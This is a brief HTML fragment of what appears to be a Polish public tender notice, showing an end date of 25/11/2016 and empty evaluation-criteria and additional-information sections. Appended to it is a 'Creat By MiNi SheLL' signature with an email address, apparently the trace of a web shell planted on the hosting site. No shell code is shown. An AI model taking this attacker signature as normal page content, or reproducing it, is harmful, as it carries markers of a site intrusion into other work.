                      data zakończenia: 25/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com